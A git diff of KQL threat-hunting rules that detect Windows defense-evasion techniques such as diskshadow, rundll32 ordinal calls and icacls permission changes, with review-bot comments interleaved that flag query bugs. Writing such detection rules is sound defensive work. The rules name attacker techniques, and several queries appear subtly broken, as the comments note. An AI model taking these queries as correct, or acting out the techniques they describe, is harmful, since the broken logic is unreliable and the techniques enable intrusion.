+// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting
+// False Positives:
+// - Likely from legitimate backup scripts
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql
index 7f88518a..b3b28d98 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql
@@ -1,13 +1,13 @@
-// Title: DLL Call by Ordinal Via Rundll32.EXE
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-10-22
-// Level: medium
-// Description: Detects calls of DLLs exports by ordinal numbers via rundll32.dll.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011, detection.threat-hunting
-// False Positives:
-// - False positives depend on scripts and administrative tools used in the monitored environment.
-// - Windows control panel elements have been identified as source (mmc).
-
-DeviceProcessEvents
+// Title: DLL Call by Ordinal Via Rundll32.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-22
+// Level: medium
+// Description: Detects calls of DLLs exports by ordinal numbers via rundll32.dll.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.threat-hunting
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment.
+// - Windows control panel elements have been identified as source (mmc).
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains ".dll #" or ProcessCommandLine contains ".ocx #") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not(((ProcessCommandLine contains "EDGEHTML.dll" and ProcessCommandLine contains "#141") or ((ProcessCommandLine contains "\\FileTracker32.dll,#1" or ProcessCommandLine contains "\\FileTracker32.dll\",#1" or ProcessCommandLine contains "\\FileTracker64.dll,#1" or ProcessCommandLine contains "\\FileTracker64.dll\",#1") and (InitiatingProcessFolderPath contains "\\Msbuild\\Current\\Bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\MSVC\\" or InitiatingProcessFolderPath contains "\\Tracker.exe")))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql b/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql
index 9b5c93dc..ef3c52e4 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql
@@ -1,14 +1,14 @@ -// Title: Dllhost.EXE Initiated Network Connection To Non-Local IP Address -// Author: bartblaze -// Date: 2020-07-13 -// Level: medium -// Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address. -// Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. -// An initial baseline is recommended before deployment. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.execution, attack.t1559.001, detection.threat-hunting -// False Positives: -// - Communication to other corporate systems that use IP addresses from public address spaces - -DeviceNetworkEvents +// Title: Dllhost.EXE Initiated Network Connection To Non-Local IP Address +// Author: bartblaze +// Date: 2020-07-13 +// Level: medium +// Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address. +// Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. +// An initial baseline is recommended before deployment. 
+// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, attack.t1559.001, detection.threat-hunting +// False Positives: +// - Communication to other corporate systems that use IP addresses from public address spaces + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\dllhost.exe" and (not(((ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "fc00::/7") or ipv4_is_in_range(RemoteIP, "fe80::/10")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11") or ipv4_is_in_range(RemoteIP, "150.171.0.0/19") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24"))))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql b/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql index 0928d6d1..9ac92f18 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql 
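Review bot: The three IPv6 exclusions on the `| where` line (`"::1/128"`, `"fc00::/7"`, `"fe80::/10"`) are evaluated with `ipv4_is_in_range`, which as far as I recall returns null rather than false when the address or range is not valid IPv4, so those terms never match; worse, an IPv6 `RemoteIP` makes every term null, `not(...)` becomes null, and `where` drops the row, so IPv6 dllhost connections are never surfaced at all. Switch those three terms to `ipv6_is_in_range(RemoteIP, "::1/128")`, `ipv6_is_in_range(RemoteIP, "fc00::/7")` and `ipv6_is_in_range(RemoteIP, "fe80::/10")`, and confirm in a tenant how a null from the IPv4 checks is treated so that an IPv6 remote is reported rather than silently filtered. The Microsoft prefix list in the second group is hard-coded and will drift; a comment naming where those ranges came from would help whoever has to refresh them.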
@@ -1,12 +1,12 @@
-// Title: DMP/HDMP File Creation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-09-07
-// Level: low
-// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, detection.threat-hunting
-// False Positives:
-// - Likely during crashes of software
-
-DeviceFileEvents
+// Title: DMP/HDMP File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-07
+// Level: low
+// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.threat-hunting
+// False Positives:
+// - Likely during crashes of software
+
+DeviceFileEvents
 | where FolderPath endswith ".dmp" or FolderPath endswith ".dump" or FolderPath endswith ".hdmp"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql b/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql
index efea574b..913435b7 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql
@@ -1,12 +1,12 @@
-// Title: Dynamic .NET Compilation Via Csc.EXE - Hunting
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-02
-// Level: medium
-// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027.004, detection.threat-hunting
-// False Positives:
-// - Many legitimate applications make use of dynamic compilation. Use this rule to hunt for anomalies
-
-DeviceProcessEvents
+// Title: Dynamic .NET Compilation Via Csc.EXE - Hunting
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-02
+// Level: medium
+// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.004, detection.threat-hunting
+// False Positives:
+// - Many legitimate applications make use of dynamic compilation. Use this rule to hunt for anomalies
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/noconfig /fullpaths @" and FolderPath endswith "\\csc.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql b/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql
index 9bc12b94..ebe4e593 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql
@@ -1,13 +1,13 @@
-// Title: File or Folder Permissions Modifications
-// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-10-23
-// Level: medium
-// Description: Detects a file or folder's permissions being modified or tampered with.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1222.001, detection.threat-hunting
-// False Positives:
-// - Users interacting with the files on their own (unlikely unless privileged users).
-// - Dynatrace app
-
-DeviceProcessEvents
+// Title: File or Folder Permissions Modifications
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-23
+// Level: medium
+// Description: Detects a file or folder's permissions being modified or tampered with.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1222.001, detection.threat-hunting
+// False Positives:
+// - Users interacting with the files on their own (unlikely unless privileged users).
+// - Dynatrace app
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains "/grant" or ProcessCommandLine contains "/setowner" or ProcessCommandLine contains "/inheritance:r") and (FolderPath endswith "\\cacls.exe" or FolderPath endswith "\\icacls.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "-r" and FolderPath endswith "\\attrib.exe") or FolderPath endswith "\\takeown.exe") and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\Avira" or ProcessCommandLine contains ":\\Program Files\\Avira") or ProcessCommandLine endswith "ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\connectivity.history /reset" or (ProcessCommandLine contains "ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\config.properties /grant :r " and ProcessCommandLine contains "S-1-5-19:F") or (ProcessCommandLine contains "\\AppData\\Local\\Programs\\Microsoft VS Code" or ProcessCommandLine contains ":\\Program Files\\Microsoft VS Code"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql
index 070e25d4..63deac6a 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql
@@ -1,11 +1,11 @@
-// Title: Headless Process Launched Via Conhost.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-07-23
-// Level: medium
-// Description: Detects the launch of a child process via "conhost.exe" with the "--headless" flag.
-// The "--headless" flag hides the windows from the user upon execution.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, detection.threat-hunting
-
-DeviceProcessEvents
+// Title: Headless Process Launched Via Conhost.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-23
+// Level: medium
+// Description: Detects the launch of a child process via "conhost.exe" with the "--headless" flag.
+// The "--headless" flag hides the windows from the user upon execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, detection.threat-hunting
+
+DeviceProcessEvents
 | where InitiatingProcessCommandLine contains "--headless" and InitiatingProcessFolderPath endswith "\\conhost.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql b/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql
index 247d2d13..e24a39ac 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql
@@ -1,12 +1,12 @@
-// Title: HH.EXE Initiated HTTP Network Connection
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-05
-// Level: medium
-// Description: Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.001, detection.threat-hunting
-// False Positives:
-// - False positive is expected from launching "hh.exe" for the first time on a machine in a while or simply from help files containing reference to external sources. Best correlate this with process creation and file events.
-
-DeviceNetworkEvents
+// Title: HH.EXE Initiated HTTP Network Connection
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-05
+// Level: medium
+// Description: Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.001, detection.threat-hunting
+// False Positives:
+// - False positive is expected from launching "hh.exe" for the first time on a machine in a while or simply from help files containing reference to external sources. Best correlate this with process creation and file events.
+
+DeviceNetworkEvents
 | where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql
index ed29b57e..56f403c9 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql
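Review bot: `RemotePort in~ ("80", "443")` on the `| where` line applies the case-insensitive string operator to `RemotePort`, which is an integer column in DeviceNetworkEvents, and compares it with string literals; I would expect Advanced Hunting to reject that with a type-mismatch error rather than silently match, which would mean the rule never returns anything — please confirm against a live tenant. The safe form is `RemotePort in (80, 443)`. Since the same construct presumably comes from the converter, it is better fixed there than in each generated file.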
+++ b/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql 
@@ -1,14 +1,14 @@
-// Title: Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2023-12-01
-// Level: medium
-// Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace.
-// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
-// These can be used for example in decrypting malicious payload for defense evasion.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1027.010, detection.threat-hunting
-// False Positives:
-// - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders.
-
-DeviceProcessEvents
+// Title: Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-12-01
+// Level: medium
+// Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace.
+// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
+// These can be used for example in decrypting malicious payload for defense evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1027.010, detection.threat-hunting
+// False Positives:
+// - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".AesCryptoServiceProvider" or ProcessCommandLine contains ".DESCryptoServiceProvider" or ProcessCommandLine contains ".DSACryptoServiceProvider" or ProcessCommandLine contains ".RC2CryptoServiceProvider" or ProcessCommandLine contains ".Rijndael" or ProcessCommandLine contains ".RSACryptoServiceProvider" or ProcessCommandLine contains ".TripleDESCryptoServiceProvider") and ProcessCommandLine contains "System.Security.Cryptography." and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql b/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql
index 5676791a..30f4e16c 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql
@@ -1,12 +1,12 @@
-// Title: Microsoft Office Trusted Location Updated
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-21
-// Level: medium
-// Description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting
-// False Positives:
-// - During office installations or setup, trusted locations are added, which will trigger this rule.
-
-DeviceRegistryEvents
+// Title: Microsoft Office Trusted Location Updated
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-21
+// Level: medium
+// Description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting
+// False Positives:
+// - During office installations or setup, trusted locations are added, which will trigger this rule.
+
+DeviceRegistryEvents
 | where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql b/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql
index e7d53510..6b91719e 100644
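Review bot: `RegistryKey endswith "\\Path"` on the `| where` line can never be true in DeviceRegistryEvents, because the value name is carried in `RegistryValueName` while `RegistryKey` holds only the key path, so as written this rule matches nothing. The predicate should become `RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryValueName =~ "Path"`. There is also no `ActionType` restriction, so once the field is fixed the query will fire on value deletions as well as the additions the description talks about; adding `ActionType == "RegistryValueSet"` would keep it to the intended behaviour, assuming that is what the source rule targets.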
--- a/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql
@@ -1,12 +1,12 @@
-// Title: Microsoft Workflow Compiler Execution
-// Author: Nik Seetharaman, frack113
-// Date: 2019-01-16
-// Level: medium
-// Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1218, detection.threat-hunting
-// False Positives:
-// - Legitimate MWC use (unlikely in modern enterprise environments)
-
-DeviceProcessEvents
+// Title: Microsoft Workflow Compiler Execution
+// Author: Nik Seetharaman, frack113
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1218, detection.threat-hunting
+// False Positives:
+// - Legitimate MWC use (unlikely in modern enterprise environments)
+
+DeviceProcessEvents
 | where FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or ProcessVersionInfoOriginalFileName =~ "Microsoft.Workflow.Compiler.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql b/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql
index e2c4ffb4..d1b38a88 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql
@@ -1,14 +1,14 @@
-// Title: Msiexec.EXE Initiated Network Connection Over HTTP
-// Author: frack113
-// Date: 2022-01-16
-// Level: low
-// Description: Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443.
-// Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages.
-// Use this rule to hunt for potentially anomalous or suspicious communications.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.007, detection.threat-hunting
-// False Positives:
-// - Likely
-
-DeviceNetworkEvents
+// Title: Msiexec.EXE Initiated Network Connection Over HTTP
+// Author: frack113
+// Date: 2022-01-16
+// Level: low
+// Description: Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443.
+// Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages.
+// Use this rule to hunt for potentially anomalous or suspicious communications.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007, detection.threat-hunting
+// False Positives:
+// - Likely
+
+DeviceNetworkEvents
 | where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\msiexec.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql
index 58fe2b64..5b0f2baa 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql
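Review bot: `RemotePort in~ ("80", "443")` on the `| where` line mixes the integer `RemotePort` column with string literals under the string-only `in~` operator, which I expect Advanced Hunting to refuse as a type mismatch, so the rule would not execute at all; worth verifying in a tenant before shipping. Replace it with `RemotePort in (80, 443)`. Given the level is "low" and the description says port 80 or 443, the integer form also reads more plainly to the next maintainer.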
@@ -1,14 +1,14 @@
-// Title: New Self Extracting Package Created Via IExpress.EXE
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2024-02-05
-// Level: medium
-// Description: Detects the "iexpress.exe" utility creating self-extracting packages.
-// Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files.
-// Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
-// False Positives:
-// - Administrators building packages using iexpress.exe
-
-DeviceProcessEvents
+// Title: New Self Extracting Package Created Via IExpress.EXE
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-02-05
+// Level: medium
+// Description: Detects the "iexpress.exe" utility creating self-extracting packages.
+// Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files.
+// Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
+// False Positives:
+// - Administrators building packages using iexpress.exe
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\makecab.exe" or ProcessVersionInfoOriginalFileName =~ "makecab.exe") and InitiatingProcessFolderPath endswith "\\iexpress.exe") or (ProcessCommandLine contains " /n " and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql b/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql
index b39d3ae1..0e74803a 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql
@@ -1,12 +1,12 @@
-// Title: New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet
-// Author: frack113
-// Date: 2024-05-03
-// Level: low
-// Description: Detects calls to the "New-NetFirewallRule" cmdlet from PowerShell in order to add a new firewall rule with an "Allow" action.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.004, detection.threat-hunting
-// False Positives:
-// - Administrator script
-
-DeviceProcessEvents
+// Title: New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet
+// Author: frack113
+// Date: 2024-05-03
+// Level: low
+// Description: Detects calls to the "New-NetFirewallRule" cmdlet from PowerShell in order to add a new firewall rule with an "Allow" action.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004, detection.threat-hunting
+// False Positives:
+// - Administrator script
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "New-NetFirewallRule " and ProcessCommandLine contains " -Action " and ProcessCommandLine contains "allow") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql
index 7219b8ac..fc420363 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql
@@ -1,11 +1,11 @@
-// Title: Potential CommandLine Obfuscation Using Unicode Characters
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022-01-15
-// Level: medium
-// Description: Detects potential CommandLine obfuscation using unicode characters.
-// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting
-
-DeviceProcessEvents
+// Title: Potential CommandLine Obfuscation Using Unicode Characters
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-01-15
+// Level: medium
+// Description: Detects potential CommandLine obfuscation using unicode characters.
+// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ" or ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄" or ProcessCommandLine contains "―" or ProcessCommandLine contains "—" or ProcessCommandLine contains " " or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "¶"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql
index 0277d730..674acdb8 100644
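Review bot: The eighth term on the `| where` line reads `ProcessCommandLine contains " "` in this rendering, i.e. what looks like an ordinary ASCII space; if the generated file really contains U+0020 rather than the intended non-ASCII whitespace character, this term matches practically every process creation and the other ten look-alike glyphs never get a chance to matter. Please check the actual byte in the emitted file and, if the converter is normalising it away, make the converter preserve it. Either way, a short comment listing the code point of each literal, along the lines of `// U+02E3, U+02EA, U+02E2, U+2215, U+2044, U+2015, U+2014, <whitespace code point>, U+00AF, U+00AE, U+00B6`, would let a reviewer tell these apart from their ASCII twins without a hex dump.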
--- a/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential DLL Sideloading Activity Via ExtExport.EXE
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-11-26
-// Level: medium
